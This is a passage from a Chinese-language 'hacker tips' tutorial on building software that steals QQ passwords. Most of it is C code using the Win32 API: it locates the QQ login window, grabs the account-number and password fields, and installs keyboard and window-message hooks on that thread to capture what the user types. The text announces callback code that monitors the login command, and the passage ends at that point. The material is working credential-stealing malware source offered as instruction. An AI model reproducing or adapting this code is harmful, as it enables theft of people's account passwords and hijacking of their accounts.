黑客心得：盗QQ密码的软件模拟实现技术

　　BOOL bRet = FALSE;

　　if (hQQLogin != NULL)

　　 {

　　DWORD dwThreadID = GetWindowThreadProcessId(hQQLogin, NULL); //这是什么意思？看MSDN

　　g_hNum = GetDlgItem(hQQLogin, 138);//不同版本QQ，此处不一样！ 得到QQ号的子窗口句柄

　　g_hPsw = GetDlgItem(hQQLogin, 180); //不同版本QQ，此处不一样！得到QQ密码的子窗口句柄

　　if (g_hNum == NULL)

　　{

　　MessageBox(NULL,"哭了，号码句柄都没有得到！","郁闷",0);

　　return FALSE;

　　}

　　if(g_hPsw==NULL)

　　{

　　MessageBox(NULL,"哭了，密码句柄都没有得到！","郁闷",0);

　　return FALSE;

　　}

　　分别键盘HOOK，和界面部分消息处理的HOOK

　　g_hProc = SetWindowsHookEx(WH_CALLWNDPROC, CallWndProc, g_hInstDLL, dwThreadID);

　　g_hKey = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, g_hInstDLL, dwThreadID);

　　bRet = (g_hProc != NULL) && (g_hKey != NULL);

　　}

　　else

　　{

　　// 卸载钩子

　　bRet = UnhookWindowsHookEx(g_hProc) && UnhookWindowsHookEx(g_hKey);

　　g_hProc = NULL;

　　g_hKey = NULL;

　　g_hNum = NULL;

　　}

　　return bRet;

　　}

　　上面是安装HOOK部分的代码，就这么简单，上面提到了CallWndProc，KeyboardProc是两个回调函数，是我第三部分要解释的钩子函数

　　第三部分：（3）钩子函数的解释

　　CallWndProc，KeyboardProc是两个回调函数的原型和具体代码如下：

　　// 钩子过程，监视“登陆”的命令消息